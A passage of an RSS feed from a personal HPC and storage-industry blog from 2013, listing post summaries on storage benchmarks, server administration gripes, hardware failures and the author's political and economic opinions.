      <link>https://blog.scalability.org/2013/06/you-can-get-a-hint-of-the-big-test-result-by-watching-the-rotating-banner-on-the-day-job-home-page/</link>
      <pubDate>Fri, 07 Jun 2013 20:09:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/you-can-get-a-hint-of-the-big-test-result-by-watching-the-rotating-banner-on-the-day-job-home-page/</guid>
      <description>Though the 11 was changed to a 12. That is being reverted. Day job home page is here. As it scrolls by, think &amp;ldquo;Massive, unapologetic, firepower&amp;rdquo;. Writ large. This would pair well with any top500 or !top500 computing system. More to come &amp;hellip; more &amp;hellip; to come !!!</description>
    </item>
    
    <item>
      <title>STAC M3 Audited report is now published</title>
      <link>https://blog.scalability.org/2013/06/stac-m3-audited-report-is-now-published/</link>
      <pubDate>Fri, 07 Jun 2013 19:53:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/stac-m3-audited-report-is-now-published/</guid>
      <description>See here. Take home message Delivered the fastest response time in the NBBO benchmark compared to all publicly disclosed results to date for all systems (STAC-M3.?1.1T.NBBO.LAT2) Delivered the fastest WRITE results compared to all publicly disclosed results for all systems (STAC-M3.v1.1T.WRITE.LAT2). Among systems using kdb+ 2.8: This system set new records for 5 of the 17 benchmarks (STAC-M3.?1.1T.NBBO.LAT2, STAC-M3.v1.1T.WRITE.LAT2, STAC-M3.?1.10T.STATS-AGG.LAT2, STAC-M3.?1.10T.STATS-UI.LAT2,STAC-M3.?1.1T.STATS-UI.LAT2). Delivered over 2x the performance of the previous best published results for the MKTSNAP benchmark, among systems using spinning disk or flash storage.</description>
    </item>
    
    <item>
      <title>The big test to which I&#39;ve alluded</title>
      <link>https://blog.scalability.org/2013/06/the-big-test-to-which-ive-alluded/</link>
      <pubDate>Wed, 05 Jun 2013 13:01:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/the-big-test-to-which-ive-alluded/</guid>
      <description>&amp;hellip; finalizing the text on this, link up soon (its up but hidden from view). The response from people who&amp;rsquo;ve seen it has been awesome. More very soon. Today, I hope.</description>
    </item>
    
    <item>
      <title>STAC M3 benchmarks to be published tomorrow</title>
      <link>https://blog.scalability.org/2013/06/stac-m3-benchmarks-to-be-published-tomorrow/</link>
      <pubDate>Wed, 05 Jun 2013 12:58:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/stac-m3-benchmarks-to-be-published-tomorrow/</guid>
      <description>I&amp;rsquo;ve got a few things to add to the report today, and then we will have the STAC group publish the report. Performance is &amp;hellip; er &amp;hellip; very &amp;hellip; very &amp;hellip; good. A few tests which won&amp;rsquo;t favor our design as compared to massively wide striped disks were better on other kit. But I am blown away at how our little 2 socket server did in comparison to other, better known kit.</description>
    </item>
    
    <item>
      <title>Finally fixed the day job DNS</title>
      <link>https://blog.scalability.org/2013/06/finally-fixed-the-day-job-dns/</link>
      <pubDate>Wed, 05 Jun 2013 12:50:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/finally-fixed-the-day-job-dns/</guid>
      <description>This took far longer than it should have. This was in part due to my initial decision (since changed) to use dbndns at two sites (one internal, one in the cloud). The TL;DR version. dbndns and its parent project, djbdns, are a royal pain to get up, operational, stable. I tried the packaged versions, the source, etc. Several different distributions (CentOS 6.x , Ubuntu 12.04, &amp;hellip;). 4 weeks into this mess, I asked myself the critical question.</description>
    </item>
    
    <item>
      <title>Article on a likely causation vector for global warming</title>
      <link>https://blog.scalability.org/2013/06/6049/</link>
      <pubDate>Sun, 02 Jun 2013 17:59:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/6049/</guid>
      <description>I am not a huge fan of the science and accompanying rhetoric around &amp;ldquo;global warming.&amp;rdquo; And its not because the Koch brothers (or any other weapons grade conspiracy theory idiocy on the part of certain activist elements of our society). Its because the &amp;ldquo;science&amp;rdquo;, or more precisely, the theory that currently holds sway in large swaths of academia, and public policy circles appears to generate testable hypotheses that are not matched against empirical observations.</description>
    </item>
    
    <item>
      <title>Wish I was going to ISC13</title>
      <link>https://blog.scalability.org/2013/05/wish-i-was-going-to-isc13/</link>
      <pubDate>Fri, 31 May 2013 15:13:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/05/wish-i-was-going-to-isc13/</guid>
      <description>I was &amp;hellip; but then it was determined that I needed to be giving 2 of the STAC summit talks in Chicago and NY on the day jobs&amp;rsquo;s systems. Then this week, Tianhe-2 info came out, and &amp;hellip; well &amp;hellip; WOW! Great job guys! (ob-day job: &amp;ldquo;could we interest you in some monsterously fast storage to go with that space-time fabric warping super?&amp;quot;) I was speaking recently with a VC we had talked to in early 2002 about accelerators.</description>
    </item>
    
    <item>
      <title>Should be able to talk about the benchies early next week</title>
      <link>https://blog.scalability.org/2013/05/should-be-able-to-talk-about-the-benchies-early-next-week/</link>
      <pubDate>Thu, 30 May 2013 01:44:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/05/should-be-able-to-talk-about-the-benchies-early-next-week/</guid>
      <description>Got confirmation from marketing folks that I won&amp;rsquo;t cause irreparable damage if I just put the link up. Next week. Early.</description>
    </item>
    
    <item>
      <title>New posts up at the day job blog, and yes, we now have a day job blog!</title>
      <link>https://blog.scalability.org/2013/05/new-posts-up-at-the-day-job-blog-and-yes-we-now-have-a-day-job-blog/</link>
      <pubDate>Wed, 29 May 2013 14:38:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/05/new-posts-up-at-the-day-job-blog-and-yes-we-now-have-a-day-job-blog/</guid>
      <description>See here: ( http://scalableinformatics.com/blog/ ) The way I looked at it, I needed a place to talk more product/solutions/work without having my own personal opinions on myriads of things weave throughout. That is, scalability.org is something of mine personally, that I write for, based upon whatever itch I wish to scratch. The blog at the day job lets us (collectively) talk about cool things without having that &amp;ldquo;me/mine&amp;rdquo; thing intermix. I&amp;rsquo;ll be updating here of course as well.</description>
    </item>
    
    <item>
      <title>What an intense 3 weeks</title>
      <link>https://blog.scalability.org/2013/05/what-an-intense-3-weeks/</link>
      <pubDate>Mon, 27 May 2013 21:03:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/05/what-an-intense-3-weeks/</guid>
      <description>I can&amp;rsquo;t talk publicly about everything yet, just its been so demanding of my time. I&amp;rsquo;ve run and debugged benchmarks, flown in to meet customers and others, generated many quotes, given many presentations. In this, I&amp;rsquo;ve got two hard deadlines for getting stuff written that I have to do before I can write anything here. So let me crank on those in the next 24 hours, and I&amp;rsquo;ll update.</description>
    </item>
    
    <item>
      <title>When you&#39;ve lost Jon Stewart ...</title>
      <link>https://blog.scalability.org/2013/05/when-youve-lost-jon-stewart/</link>
      <pubDate>Thu, 16 May 2013 12:16:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/05/when-youve-lost-jon-stewart/</guid>
      <description>Here in the US, we have a number of scandals brewing. Many of those for the party in control of the White House and the Senate would like to have you believe that these are in fact tempests in teapots. In this case, there are at least 2 Nixonian scandals going non-linear here, with a 3rd trying to break through. The political left is doing all it can to wave off one of them, though this is getting progressively harder by the day as more information comes out.</description>
    </item>
    
    <item>
      <title>What would you do if you had &#34;infinite&#34; bandwidth and IOPs coupled directly to your computing?</title>
      <link>https://blog.scalability.org/2013/05/what-would-you-do-if-you-had-infinite-bandwidth-and-iops-coupled-directly-to-your-computing/</link>
      <pubDate>Wed, 08 May 2013 04:27:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/05/what-would-you-do-if-you-had-infinite-bandwidth-and-iops-coupled-directly-to-your-computing/</guid>
      <description>Imagine you have some &amp;hellip; I dunno &amp;hellip; gargantuan amount of bandwidth available, to and from your disks. And you have just positively insane IOP rates, at these very high bandwidths. And then you tightly couple a few hundred processor cores, and a few terabytes of memory. What would you consider &amp;ldquo;gargantuan&amp;rdquo; bandwidth? What would you consider &amp;ldquo;insane&amp;rdquo; IOP rates? And most importantly, if you had the type of IO fire power you considered gargantuan and insane, what would you do with this?</description>
    </item>
    
    <item>
      <title>Don&#39;t know if I mentioned it, but the day job has a new website</title>
      <link>https://blog.scalability.org/2013/04/dont-know-if-i-mentioned-it-but-the-day-job-has-a-new-website/</link>
      <pubDate>Sun, 28 Apr 2013 23:25:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/04/dont-know-if-i-mentioned-it-but-the-day-job-has-a-new-website/</guid>
      <description>Take a gander. Some things are missing, and our marketing folks are developing the content where needed, and revising it where we have existing content. Its quite refreshing to see this. It will get better over time. Its running in our facility now, and likely we&amp;rsquo;ll have a few clones in the cloud as well. But thats for later.</description>
    </item>
    
    <item>
      <title>Having fun writing a presentation about molecular dynamics and big data</title>
      <link>https://blog.scalability.org/2013/04/having-fun-writing-a-presentation-about-molecular-dynamics-and-big-data/</link>
      <pubDate>Sun, 28 Apr 2013 03:28:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/04/having-fun-writing-a-presentation-about-molecular-dynamics-and-big-data/</guid>
      <description>Who&amp;rsquo;da ever thunk that MD simulations would start to become large enough to present IO and analysis problems? Way way back when the digital supercomputing dinosaurs roamed the earth, looking for problems to crunch on, I simulated gallium arsenide on some of these machines. I&amp;rsquo;d be lucky to get 100 time steps done, in a week, for 64 atoms. 64 atoms in double precision, with position, velocity, and atom type, lets be generous and call this 64 bytes in binary or 80 bytes, one terminal line, per atom in text.</description>
    </item>
    
    <item>
      <title>Do we really have enough native STEM workers in the US?</title>
      <link>https://blog.scalability.org/2013/04/do-we-really-have-enough-native-stem-workers-in-the-us/</link>
      <pubDate>Fri, 26 Apr 2013 20:01:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/04/do-we-really-have-enough-native-stem-workers-in-the-us/</guid>
      <description>Yes, actually we do. Too many. Turns out that little law of supply and demand does in fact hold true. The higher the demand for something in limited supply, the higher the price (wages) you will pay for it. By applying forces to this law, you impact a number of outcomes. That is, if you start monkeying around with the supply, sure, you can adjust the price you pay for the STEM.</description>
    </item>
    
    <item>
      <title>Why I am taking a while to post the results</title>
      <link>https://blog.scalability.org/2013/04/why-i-am-taking-a-while-to-post-the-results/</link>
      <pubDate>Mon, 22 Apr 2013 23:31:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/04/why-i-am-taking-a-while-to-post-the-results/</guid>
      <description>In short, I am trying to verify what we measured. Its repeatable, I&amp;rsquo;ve been measuring it for a week now, and having trouble with it, but I want to make absolutely sure I get this correct. Because these are big numbers. Very. Very. Big. It would be annoying if I made a mistake. So I am double/triple/quadruple checking.</description>
    </item>
    
    <item>
      <title>Social Media Overload</title>
      <link>https://blog.scalability.org/2013/04/social-media-overload/</link>
      <pubDate>Mon, 22 Apr 2013 21:32:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/04/social-media-overload/</guid>
      <description>Definition: When the amount of social media that everyone expects you to consume with a myriad of different, incompatible, and often annoying apps, absorbs so much of your time that your productivity drops &amp;hellip; you decide that in the interests of your own personal sanity, you will spend more time with your family, your dog, and your friends, than dealing with {facebook,twitter,linkedin,RANDOM_SOCIAL_MEDIA_NAME} streams which steal time from the important things in life.</description>
    </item>
    
    <item>
      <title>It must be some obscure law of nature</title>
      <link>https://blog.scalability.org/2013/04/it-must-be-some-obscure-law-of-nature/</link>
      <pubDate>Mon, 22 Apr 2013 20:40:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/04/it-must-be-some-obscure-law-of-nature/</guid>
      <description>&amp;hellip; whereby when I have the least time to spend on a particular task, there is an ordering of requests that I maximize the time spent on that task using the least efficient mechanisms possible. Put another way, when I am busy, more people seek more of my time to handle things that I shouldn&amp;rsquo;t need to be involved in. Or another way &amp;hellip; simple things should be trivial, complex things possible, and yet the universe appears to arrange it self so that simple things become complex, and complex things become impossible.</description>
    </item>
    
    <item>
      <title>Back with some benchmarks for siCloud</title>
      <link>https://blog.scalability.org/2013/04/back-with-some-benchmarks-for-sicloud/</link>
      <pubDate>Mon, 22 Apr 2013 01:01:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/04/back-with-some-benchmarks-for-sicloud/</guid>
      <description>For the day job. They are &amp;hellip; well &amp;hellip; pretty nice. What is siCloud you might ask? Well, think a very &amp;hellip; very fast storage and computing cloud, leveraging many technologies we&amp;rsquo;ve developed. You will be hearing more about this soon. And I&amp;rsquo;ll show some numbers and pictures in another post. But before I get them up, anyone want to hazard a guess on the aggregate bandwidth and IOP rate for this system?</description>
    </item>
    
    <item>
      <title>Again, terribly busy</title>
      <link>https://blog.scalability.org/2013/04/again-terribly-busy/</link>
      <pubDate>Tue, 16 Apr 2013 14:38:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/04/again-terribly-busy/</guid>
      <description>Have an order which is absorbing all of my cycles, and this is coupled with a nice springtime cold, and an elbow injury. Now if my dog bites me, my month will be complete. Will start posting soon, once I get the the burn-in running. To give you a sense of the size of this order, we are installing additional power and AC capacity in our lab (its happening now). We just asked our landlord if they have a larger space in this complex (its built into our lease, as we weren&amp;rsquo;t sure of our growth rates), and they really don&amp;rsquo;t have anything we can use, so we might just suffer here for another year, and build up capacity in NJ.</description>
    </item>
    
    <item>
      <title>Off to HPC on Wall Street</title>
      <link>https://blog.scalability.org/2013/04/off-to-hpc-on-wall-street/</link>
      <pubDate>Sat, 06 Apr 2013 02:03:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/04/off-to-hpc-on-wall-street/</guid>
      <description>Looking forward to this. Our booth is smaller, but in a higher traffic area. We have 2 systems with us, a siFlash and a 60 bay JackRabbit. And we are putting together a small get-together after the show. This should be fun. I am looking forward to it. I&amp;rsquo;ll try to tweet from the show floor.</description>
    </item>
    
    <item>
      <title>This will not end well</title>
      <link>https://blog.scalability.org/2013/04/this-will-not-end-well/</link>
      <pubDate>Mon, 01 Apr 2013 17:06:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/04/this-will-not-end-well/</guid>
      <description>Watching the slow motion train wreck in Cyprus made me wonder exactly whom the target of the money grab was. And more importatly, whether or not the people making demands had any clue that their victory was, at best, Pyrrhic, and at worst, a serious contagion. Any financial system in operation is built upon various levels of trust, implicitly in the case of the least risky capital storage system. You know that you can trust, within reasonable expectations and parameters, that capital that you deposit there can be retrieved later.</description>
    </item>
    
    <item>
      <title>You think I would learn already</title>
      <link>https://blog.scalability.org/2013/03/you-think-i-would-learn-already/</link>
      <pubDate>Sun, 31 Mar 2013 16:48:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/you-think-i-would-learn-already/</guid>
      <description>Its called &amp;ldquo;fractured bone spur tip of olecranon&amp;rdquo;. It means I&amp;rsquo;ve got a broken bone in my elbow area. My arm is in a sling and immobilized. Got it while sparring at a karate tournament. Landed hard on my elbow due to a slippery floor. Of course its my right arm, the one I write with. I am typing this with one hand, using the hunt and pick method. Seriously need voice IO for machines.</description>
    </item>
    
    <item>
      <title>Products versus projects</title>
      <link>https://blog.scalability.org/2013/03/products-versus-projects/</link>
      <pubDate>Fri, 29 Mar 2013 15:32:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/products-versus-projects/</guid>
      <description>Long ago I pondered
Projects, inherently, are un-finished entities. There are missing things. There are &amp;ldquo;un-implemented features&amp;rdquo; which would be necessary for a product. Like say, an on-off switch, among other things. Products are inherently compromises between design, realities of implementation costs/schedules/complexities, etc. Software developers often get into the endless cycle of tweaking features and improving systems so that they miss target dates. We see this with larger scale projects as well, unless someone adopts the iron-fist rule on adding/tweaking versus shipping/learning/improving $version++.</description>
    </item>
    
    <item>
      <title>Windows 8 is terrible</title>
      <link>https://blog.scalability.org/2013/03/windows-8-is-terrible/</link>
      <pubDate>Tue, 26 Mar 2013 00:05:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/windows-8-is-terrible/</guid>
      <description>No, thats unfair to things that are truly terrible. It sets a low mark &amp;hellip; a really &amp;hellip; really &amp;hellip; low mark. Trying to help a relative with adding a printer. A printer that happily works under windows 7. No issues, just works. Works under Linux on my laptop here. Nothing special, just works. But windows 8? Oh &amp;hellip; no &amp;hellip; it &amp;hellip; doesn&amp;rsquo;t. Drivers (the built in ones we are told to use) don&amp;rsquo;t work.</description>
    </item>
    
    <item>
      <title>#youknowyouaretravelingwaytoomuchwhen ...</title>
      <link>https://blog.scalability.org/2013/03/youknowyouaretravelingwaytoomuchwhen/</link>
      <pubDate>Mon, 25 Mar 2013 22:49:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/youknowyouaretravelingwaytoomuchwhen/</guid>
      <description>&amp;hellip; the guy driving the car rental bus recognizes you and talks about how often you&amp;rsquo;ve been there.</description>
    </item>
    
    <item>
      <title>This simply needs to be said ... Networkmanager must be neutered</title>
      <link>https://blog.scalability.org/2013/03/this-simply-needs-to-be-said-networkmanager-must-be-neutered/</link>
      <pubDate>Sun, 24 Mar 2013 21:47:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/this-simply-needs-to-be-said-networkmanager-must-be-neutered/</guid>
      <description>It should never, ever be enabled by a default install on a server. Ever. Under any circumstances. For any reason. I&amp;rsquo;d even argue it should never be installed by default for any reason on a server. Just fixed another NetworkManager-caused problem (TM). Modifying /etc/resolv.conf on a server after I changed the NICs as indicated. I mean &amp;hellip; seriously folks?</description>
    </item>
    
    <item>
      <title>Failing 10GbE NICs</title>
      <link>https://blog.scalability.org/2013/03/failing-10gbe-nics/</link>
      <pubDate>Sun, 24 Mar 2013 18:14:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/failing-10gbe-nics/</guid>
      <description>I won&amp;rsquo;t mention vendor by name here. Needless to say, I am unhappy with the failure rate on their NICs. We had a number of units we bought for internal use as well as for customer use. The NICs would throw various driver exceptions, and kernel panic the machines. It was doing this to our central server this past week, while I had been lighting up kvm&amp;rsquo;s on an app server, specifically kernel panicking under even moderate load.</description>
    </item>
    
    <item>
      <title>Update on IPMI Console Logger</title>
      <link>https://blog.scalability.org/2013/03/update-on-ipmi-console-logger/</link>
      <pubDate>Sun, 24 Mar 2013 17:59:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/update-on-ipmi-console-logger/</guid>
      <description>Config now comes from some nice and simple json, and it handles multiple machines with aplomb. See the git repository for the latest. The config file example is in there, and you can replicate the n01-ipmi section with more nodes trivially. Coming next is getting config from a trusted web server, along with registering the client to the trusted web server. This prevents things like passwords from showing up in the clear, though you can always create a lower privileged user to access the console for monitoring.</description>
    </item>
    
    <item>
      <title>Presentation from Kx 2013 NYC user group meeting up</title>
      <link>https://blog.scalability.org/2013/03/presentation-from-kx-2013-nyc-user-group-meeting-up/</link>
      <pubDate>Thu, 21 Mar 2013 13:56:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/presentation-from-kx-2013-nyc-user-group-meeting-up/</guid>
      <description>at the $day job. See it here.</description>
    </item>
    
    <item>
      <title>Time wasting phone call detector regex</title>
      <link>https://blog.scalability.org/2013/03/time-wasting-phone-call-detector-regex/</link>
      <pubDate>Wed, 13 Mar 2013 18:35:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/time-wasting-phone-call-detector-regex/</guid>
      <description>So there you are, sitting at your desk trying to do your work. A call comes in, you pick it up. Me: $day_job, Landman speaking Them: I would like to speak to (garbled) about (garbled) meta-Me: [start 15 second BS detector clock filter] Me: I&amp;rsquo;m sorry, I can&amp;rsquo;t hear you &amp;hellip; who are you and what is this call about? Them: (barely audible) I am XYZ PDQ representing ABC DEF, and how is your day going?</description>
    </item>
    
    <item>
      <title>The sequester is here</title>
      <link>https://blog.scalability.org/2013/03/the-sequester-is-here/</link>
      <pubDate>Sat, 09 Mar 2013 16:40:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/the-sequester-is-here/</guid>
      <description>Suffice it to say that much hot air was blown over the sequester in the media. Really, there was much tearing of clothes over this. Much righteous indignation that someone in government, somewhere, would have to make (not so very hard) decisions about where to trim budgets. We needed this, as the US government is so completely broken as to no be able to propose a reasonable budget, pass a reasonable budget, nor listen to and work with ideas from other portions of the legislative branch which want to work on reasonable budgets.</description>
    </item>
    
    <item>
      <title>More blurring of lines between platform providers and competitors</title>
      <link>https://blog.scalability.org/2013/03/more-blurring-of-lines-between-platform-providers-and-competitors/</link>
      <pubDate>Sat, 09 Mar 2013 15:36:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/more-blurring-of-lines-between-platform-providers-and-competitors/</guid>
      <description>I had pointed out recently that large platform as a service, or pretty much any *aaS type model, where you present your value atop someone elses platform, leveraging their technologies, is ripe for having the *aaS provider decide they want to move into your space. Once you&amp;rsquo;ve done the hard work of proving there is a space in the first place. Well, the Register has an article on this now. I gave a number of specific examples, and pointed out that Amazon isn&amp;rsquo;t the first to do this, Microsoft had previously done this to the level of an art form.</description>
    </item>
    
    <item>
      <title>There are no silver bullets</title>
      <link>https://blog.scalability.org/2013/02/there-are-no-silver-bullets/</link>
      <pubDate>Thu, 28 Feb 2013 05:23:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/there-are-no-silver-bullets/</guid>
      <description>&amp;hellip; and anyone promising you one is selling you something. This is true everywhere, though especially so in massively overhyped markets. There are no secret incantations that will tease actionable insights out of gargantuan bolus of data. Yet, from all the &amp;ldquo;company X now has a hyper optimized, purple colored Hadoop distro, with a pony&amp;rdquo; announcements, one might think that it was a panacea &amp;hellip; a panopticon with infinite ability to extract the most profound and profitable nuggets from mountains of steaming piles of bits.</description>
    </item>
    
    <item>
      <title>Bow before big data</title>
      <link>https://blog.scalability.org/2013/02/bow-before-big-data/</link>
      <pubDate>Wed, 27 Feb 2013 02:13:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/bow-before-big-data/</guid>
      <description>Its a Dilbert cartoon, located here. Originally seen on Mu Sigma blog.</description>
    </item>
    
    <item>
      <title>A replacement laptop for my daughter</title>
      <link>https://blog.scalability.org/2013/02/a-replacement-laptop-for-my-daughter/</link>
      <pubDate>Mon, 25 Feb 2013 17:24:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/a-replacement-laptop-for-my-daughter/</guid>
      <description>Her old Dell Inspiron died, again. First it was a motherboard. Then a hard disk. And a cracked bezel. Now it looks like its a motherboard again. The power supply bits are, IMO, completely unforgivable. Until Dell lets us use a replacement supply that is not manufactured by Dell, we won&amp;rsquo;t be buying Dell laptops. I suspect this will be a while. But this laptop, and my wife&amp;rsquo;s version, have lots of problems.</description>
    </item>
    
    <item>
      <title>Reaching saturation: Our ongoing glut of Ph.D. educated talent</title>
      <link>https://blog.scalability.org/2013/02/reaching-saturation-our-ongoing-glut-of-ph-d-educated-talent/</link>
      <pubDate>Mon, 25 Feb 2013 16:20:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/reaching-saturation-our-ongoing-glut-of-ph-d-educated-talent/</guid>
      <description>Achieving a Ph.D. is one of the highest academic goals one can set. You work insanely hard, you sacrifice income, starting a family, and many other things, in the pursuit of this (in most cases). And when you finish, you are, theoretically, in an upper strata of accomplishment. Many (including myself) entered into this path, decades ago, based upon (now known to be either overtly falsified, or completely incompetently analyzed) data which suggested a dearth of scientists needed to staff the ever growing colleges and universities departments, and the massively growing industrial scientific community, as a solid rationale for pursuing such a difficult course.</description>
    </item>
    
    <item>
      <title>Why posting has been slow</title>
      <link>https://blog.scalability.org/2013/02/why-posting-has-been-slow/</link>
      <pubDate>Mon, 25 Feb 2013 00:55:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/why-posting-has-been-slow/</guid>
      <description>Time. Basically I have none. I steal some here and there to get things out, but I have been completely swamped. Or I post when I am up late at night/early morning, and can&amp;rsquo;t get to sleep (occasional hazard of running a growing business). On a happy note, the company is growing. We have brought 4 people on board over the last six months, with an additional 2-4 planned near term.</description>
    </item>
    
    <item>
      <title>As the clouds change ...</title>
      <link>https://blog.scalability.org/2013/02/as-the-clouds-change/</link>
      <pubDate>Wed, 20 Feb 2013 00:18:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/as-the-clouds-change/</guid>
      <description>This is going to take a few paragraphs to set up, to please bear with me. One of the harder aspects to building a business atop someone else&amp;rsquo;s platform is a fundamental dependency upon them that you create. Your business depends, to a very large extent upon their good will, and their desire to grow an ecosystem. Every now and then you get more predatory platform providers. These groups like to take control of larger segments of ecosystem, and provide a product or service that gets harder for others to compete with, because, in part, they are naturally disadvantaged in doing so.</description>
    </item>
    
    <item>
      <title>ATI experiment update: day 19</title>
      <link>https://blog.scalability.org/2013/02/ati-experiment-update-day-19/</link>
      <pubDate>Tue, 19 Feb 2013 22:06:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/ati-experiment-update-day-19/</guid>
      <description>So here I am, with an ATI W5000 card driving my dual display Linux desktop. I had pulled the NVidia GEForce card, as the driver or the card kept tossing Xid: NVRM errors, that I could not make go away. Googling this error took me back to years of people dealing with similar issues, and never getting a fix. Just reporting the same problem. That was very annoying. The day job has customers with these cards &amp;hellip; exactly what are we supposed to be telling them?</description>
    </item>
    
    <item>
      <title>[Updated] #walkingspam that you cannot easily filter electronically</title>
      <link>https://blog.scalability.org/2013/02/walkingspam-that-you-cannot-easily-filter-electronically/</link>
      <pubDate>Sun, 17 Feb 2013 17:45:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/walkingspam-that-you-cannot-easily-filter-electronically/</guid>
      <description>[update] Ok, this was amusing. An SEO group commented with a link back to their SEO site. Our spam filter caught it. (/shakes head) We had the most &amp;hellip; well &amp;hellip; interesting event happen at the office a few days ago. You know how, in your spam filtered email you get hundreds or thousands of items with wording something like this: If you were my Client you would be # 1 on Google or I can make you # 1 on Google in 3 Weeks.</description>
    </item>
    
    <item>
      <title>A lightly ARMed JackRabbit 60 bay unit</title>
      <link>https://blog.scalability.org/2013/02/a-lightly-armed-jackrabbit-60-bay-unit/</link>
      <pubDate>Wed, 13 Feb 2013 23:35:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/a-lightly-armed-jackrabbit-60-bay-unit/</guid>
      <description>This is 8x nodes (2x EnergyCards) of Calxeda goodness. We expect to be able to show off (and demo!) a live, more heavily ARMed unit shortly.
[ ](/images/ARMed_JackRabbit.jpg)</description>
    </item>
    
    <item>
      <title>Putting a 60 bay JackRabbit through some basic tests</title>
      <link>https://blog.scalability.org/2013/02/putting-a-60-bay-jackrabbit-through-some-basic-tests/</link>
      <pubDate>Wed, 13 Feb 2013 23:09:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/putting-a-60-bay-jackrabbit-through-some-basic-tests/</guid>
      <description>Basic (conservative) configuration of the day jobs&#39; high performance tightly coupled storage system, no SSDs (apart from the OS drives). RAID6 LUNs, no RAID0&amp;rsquo;s. This is spinning rust folks. Nothing but spinning rust. In a realistic configuration. And no, we haven&amp;rsquo;t yet begun to tune this. Streaming writes, 1 thread per LUN:
Run status group 0 (all jobs): WRITE: io=1279.5GB, aggrb=5944.6MB/s, minb=5944.6MB/s, maxb=5944.6MB/s, mint=220405msec, maxt=220405msec  5.9 GB/s sustained writes for this case.</description>
    </item>
    
    <item>
      <title>karma?</title>
      <link>https://blog.scalability.org/2013/02/karma/</link>
      <pubDate>Mon, 11 Feb 2013 22:38:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/karma/</guid>
      <description>On this blog, I&amp;rsquo;ve pointed out the failings of many others. I&amp;rsquo;ve hinted at having to take ownership for others failures as the customer sees us, and not the people behind us (often messing with us). Our job is, among many other things, to hide that silliness away from them so they can focus upon their issues. This is not to say we/I don&amp;rsquo;t mess up. Most of the time its minor.</description>
    </item>
    
    <item>
      <title>Getting out of Dodge</title>
      <link>https://blog.scalability.org/2013/02/getting-out-of-dodge/</link>
      <pubDate>Sat, 09 Feb 2013 18:58:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/getting-out-of-dodge/</guid>
      <description>Thursday morning, the weather prediction was for 1-3 inches of snow in Secaucus, NJ. I&amp;rsquo;d been in a data center working the past week on bringing a system to final state. Its done modulo some cosmetic and minor functional issues that should not impede usage. So we accomplished this mission, though I am something of a perfectionist, so we&amp;rsquo;ll be going back out in a week or so to work on the cosmetic bits.</description>
    </item>
    
    <item>
      <title>Enable changes or enforce design</title>
      <link>https://blog.scalability.org/2013/02/enable-changes-or-enforce-design/</link>
      <pubDate>Sat, 09 Feb 2013 18:37:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/enable-changes-or-enforce-design/</guid>
      <description>We have this dilemma. Customers who see our siCluster systems often like everything they see, but want &amp;ldquo;minor&amp;rdquo; changes. And we evaluate the changes they want for impact, describe it, and suggest a go/no-go based upon many aspects. Including supportability, stability, etc. We like providing this flexibility. Which gives rise to the dilemma. For us to provide supportable systems that work in a predictable manner, we have to cordon off changes.</description>
    </item>
    
    <item>
      <title>Baseline test for technical staff</title>
      <link>https://blog.scalability.org/2013/02/baseline-test-for-technical-staff/</link>
      <pubDate>Sat, 02 Feb 2013 23:26:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/baseline-test-for-technical-staff/</guid>
      <description>As usual, xkcd knocks it out of the park.
[ ](http://xkcd.com/1168/)
I talked about qualifications for our SE position. The ability to talk customers through complex vi-based configuration sessions for system files, while driving 70 mph on the freeway, is a hard requirement. Not quite a munition defusing effort, but close enough. Unfortunately in something like the game of telephone, what I originally wrote was &amp;hellip; transmogrified &amp;hellip; into something very different.</description>
    </item>
    
    <item>
      <title>A week into the ATI experiment</title>
      <link>https://blog.scalability.org/2013/02/a-week-into-the-ati-experiment/</link>
      <pubDate>Fri, 01 Feb 2013 22:26:48 +0000</pubDate>
      
